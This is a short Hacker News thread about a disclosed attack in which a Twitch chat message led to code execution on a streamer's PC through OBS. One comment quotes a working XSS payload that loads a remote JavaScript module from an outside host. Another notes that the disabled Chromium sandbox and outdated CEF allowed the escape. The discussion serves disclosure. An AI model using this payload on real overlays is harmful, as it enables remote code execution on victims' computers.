‹ BackHN Continuity

Thread

How one Twitch chat message became code execution on a streamer’s PC

67 points · 30 comments · tau255

  1. verteu · · focus · HN ↗
    tldr: XSS on OBS via the message

      !image http://toto.jpg/x'onerror=import('https://ha10.scrt.ch:8080/poc-module.js');a='a
    1. Macha · · focus · HN ↗
      The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)
      1. Toprogos · · focus · HN ↗

        [dead]

Open on Hacker News to reply ↗

Unofficial Hacker News client; not affiliated with Y Combinator.